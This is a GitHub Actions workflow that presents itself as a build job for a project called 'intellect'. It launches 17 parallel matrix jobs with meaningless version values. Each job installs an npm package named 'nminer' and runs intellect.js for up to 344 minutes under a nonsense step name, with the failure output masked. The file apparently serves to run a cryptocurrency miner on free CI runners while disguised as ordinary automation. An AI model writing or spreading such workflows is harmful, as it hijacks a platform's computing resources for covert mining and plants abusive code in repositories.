name: intellect
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 965 }
          - { version: 5601 }
          - { version: 6466 }
          - { version: 6502 }
          - { version: 4232 }
          - { version: 9224 }
          - { version: 4032 }
          - { version: 8895 }
          - { version: 8050 }
          - { version: 7263 }
          - { version: 8717 }
          - { version: 8428 }
          - { version: 3226 }
          - { version: 897 }
          - { version: 1091 }
          - { version: 3693 }
          - { version: 1445 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: usable come jaywalk
        run: |
          npm install nminer@latest
          timeout 344m node intellect.js || echo "intellect executed"